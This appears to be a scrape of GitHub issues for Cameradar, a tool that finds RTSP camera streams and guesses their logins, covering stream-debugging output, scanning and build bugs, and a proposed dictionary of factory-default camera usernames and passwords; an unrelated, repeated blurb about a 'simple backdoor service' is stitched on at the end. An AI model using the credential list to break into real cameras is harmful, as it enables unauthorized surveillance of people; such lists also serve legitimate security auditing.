    < RTSP/1.0 200 OK
    < CSeq: 1
    < Server: ALi feng/2.1.0_rc1
    < Content-Type: application/sdp
    < Content-Base: rtsp://:@
    < Date: Week 4, 1 Mon0 0070 22:12:43 GMT
    < Content-Length: 226
    o=- 2209068544 2209068544 IN IP4
    s=RTSP Session
    c=IN IP4
    t=0 0
    a=tool:ALi feng 2.1.0_rc1 Streaming Server
    m=video 0 RTP/AVP 33
    * Curl_http_done: called premature == 0
    * Connection #0 to host left intact
    ▶       Device RTSP URL:        rtsp://:@
            Device model:
            IP address:   
            RTSP port:              554
            RTSP route:             /1.AMP

    Here cameradar correctly outputs that a stream has been found and it's accessible due to the 200 response. However when you try to connect to the stream, this happens

    testRTSPClient rtsp://

    root@localhost:~# testRTSPClient rtsp://:@
    Opening connection to, port 554...
    ...remote connection opened
    Sending request: DESCRIBE rtsp://:@ RTSP/1.0
    CSeq: 2
    User-Agent: testRTSPClient (LIVE555 Streaming Media v2016.11.28)
    Accept: application/sdp
    Received 424 new bytes of response data.
    Received a complete DESCRIBE response:
    RTSP/1.0 200 OK
    CSeq: 2
    Server: ALi feng/2.1.0_rc1
    Content-Type: application/sdp
    Content-Base: rtsp://:@
    Date: Week 4, 1 Mon0 0070 22:30:07 GMT
    Content-Length: 226
    o=- 2209069568 2209069568 IN IP4
    s=RTSP Session
    c=IN IP4
    t=0 0
    a=tool:ALi feng 2.1.0_rc1 Streaming Server
    m=video 0 RTP/AVP 33
    [URL:"rtsp://:@"]: Got a SDP description:
    o=- 2209069568 2209069568 IN IP4
    s=RTSP Session
    c=IN IP4
    t=0 0
    a=tool:ALi feng 2.1.0_rc1 Streaming Server
    m=video 0 RTP/AVP 33
    [URL:"rtsp://:@"]: Initiated the "video/MP2T" sub
    session (client ports 33332-33333)
    Sending request: SETUP rtsp://:@ RTSP/1.
    CSeq: 3
    User-Agent: testRTSPClient (LIVE555 Streaming Media v2016.11.28)
    Transport: RTP/AVP;unicast;client_port=33332-33333
    Received 113 new bytes of response data.
    Received a complete SETUP response:
    RTSP/1.0 503 Service Unavailable
    CSeq: 3
    Server: ALi feng/2.1.0_rc1
    Date: Week 4, 1 Mon0 0070 22:30:07 GMT
    [URL:"rtsp://:@"]: Failed to set up the "video/MP
    2T" subsession: 503 Service Unavailable
    [URL:"rtsp://:@"]: Failed to start playing sessio
    n: No RTSP session is currently in progress
    [URL:"rtsp://:@"]: Closing the stream.

    Here you can see that after issuing a DESCRIBE request, testRTSPClient issues a second SETUP request and fails due to the 503 Service Unavailable response.

    I think it would be awesome if cameradar automated such process, without having the user actually debug what's going on using third party tools.

    Anyway this was just an enhancement idea I had. Hopefully you'll consider implementing such functionality in the near future.

    All the best


  • Cannot use file for target as namp will fail to resolve

    Cannot use file for target as namp will fail to resolve

    Given a list of IPs

    and command: docker run -v "$(pwd):/data" --net=host -t ullaakut/cameradar -t /data/ips.txt -d -p 554

    nmap reports

    > [Nmap Warning] Failed to resolve "
    ".> [Nmap Warning] Failed to resolve "

    and only the last IP in the list is actually scanned.

    The file is a UTF-8 plaintext file: image

    I'm running docker desktop on Windows with the provided example commands

  • Arm64 build failed

    Arm64 build failed

    Hi again) Can`t compile now for arm64. For amd64 everything ok, but if i try: env GOOS=android GOARCH=arm64 go build -o radar2

    Getting this: ../../attack.go:202:15: undefined: curl.OPT_URL ../../attack.go:204:15: undefined: curl.OPT_RTSP_STREAM_URI ../../attack.go:205:15: undefined: curl.OPT_RTSP_REQUEST ../../attack.go:214:29: undefined: curl.INFO_HTTPAUTH_AVAIL ../../attack.go:242:15: undefined: curl.OPT_HTTPAUTH ../../attack.go:243:15: undefined: curl.OPT_USERPWD ../../attack.go:246:15: undefined: curl.OPT_URL ../../attack.go:248:15: undefined: curl.OPT_RTSP_STREAM_URI ../../curl.go:12:15: undefined: curl.CurlInfo ../../curl.go:19:2: undefined: curl.CURL ../../attack.go:248:15: too many errors

    Any solutions?

  • mass scan ?

    mass scan ?

    Hi, I used your tool on my network and it seems to works great ! But I had a question, is this possible to scan a list of ip (mass scan) with a txt file ? I searched for answers on forums, but I found nothing ... Thanks for your answer :)

  • Document how to run Cameradar on Android (no Nethunter) without root

    Document how to run Cameradar on Android (no Nethunter) without root

    Udocker can be installed on Android in Termux.

    Is it possible to run Cameradar using Udocker on Android 10 without rooting a smartphone?


    Or maybe you know another way?

  • Add new credentials to the default dictionary

    Add new credentials to the default dictionary

    gives my list of factory logins and passwords that I could find on the Internet, including wifi spy cameras supporting RTSP using android lookcampro and hdsmartIPC applications { "usernames": [ "", "666666", "888888", "Admin", "admin", "admin1", "administrator", "Administrator", "aiphone", "Dinion", "guest", "root", "service", "supervisor", "ubnt", "user" ], "passwords": [ "", "0000", "000000", "1111", "111111", "1111111", "11111111", "1234", "12341234", "12345", "123456", "1234567", "12345678", "123456789", "1234567890", "4321", "6666", "666666", "6fJjMKYx", "8888", "888888", "9999", "999999", "999988", "99999999", "ADMIN", "Admin", "hi3518", "jvbzd", "JVC", "Karnet", "Meins", "admin", "administrator", "aiphone", "camera", "fliradmin", "GRwvcj8j", "guest", "hikadmin", "hikvision", "ikwd", "jvc", "kj3TqCWv", "klv123", "meinsm", "none", "novus", "pass", "password", "password123", "reolink", "root", "service", "supervisor", "system", "tlJwpbo6", "toor", "tp-link", "ubnt", "user", "wbox123", "xc3511", "xmhdipc", "Y5eIMz3C" ] }

its a simple backdoor service that im making cuz i think that it could be cool its not finished but this is a cool project
  its a simple backdoor service that im making cuz i think that it could be cool its not finished but this is a cool project

yackdoor its a simple backdoor service that im making cuz i think that it could be cool its not finished but this is a cool project how it looks backd

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its a simple backdoor service that im making cuz i think that it could be cool its not finished but this is a cool project
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